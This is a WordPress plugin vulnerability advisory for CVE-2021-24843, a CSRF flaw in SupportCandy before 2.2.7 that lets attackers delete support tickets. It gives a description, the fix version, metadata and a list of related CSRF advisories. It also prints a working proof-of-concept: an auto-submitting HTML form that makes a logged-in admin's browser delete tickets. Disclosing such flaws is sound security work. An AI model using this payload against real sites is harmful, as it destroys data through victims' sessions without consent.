SupportCandy < 2.2.7 – Arbitrary Ticket Deletion via CSRF | CVE 2021-24843 | Plugin Vulnerabilities

Description

The plugin does not have CRSF check in its wpsc_tickets AJAX action, which could allow attackers to make a logged in admin call it and delete arbitrary tickets via the set_delete_permanently_bulk_ticket setting_action.

Proof of Concept

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpsc_tickets" />
      <input type="hidden" name="setting_action" value="set_delete_permanently_bulk_ticket" />
      <input type="hidden" name="ticket_id" value="1" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 2.2.7

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter twitter

Verified

Yes

WPVDB ID

b71f53d7-6b9e-458c-8754-576ad2a52f7d

Timeline

Publicly Published

2022-01-05 (about 3 years ago)

Added

2022-01-05 (about 3 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2024-08-20

Title

OTA Sync Booking Engine Widget < 1.3.0 - Settings Update via CSRF

Published

2017-01-11

Title

WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)

Published

2023-05-15

Title

WooCommerce Product Add-ons < 6.2.0 - Cross-Site Request Forgery

Published

2024-08-15

Title

Download Plugins and Themes from Dashboard < 1.8.8 - Cross-Site Request Forgery

Published

2025-03-31

Title

AB Google Map Travel <= 4.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting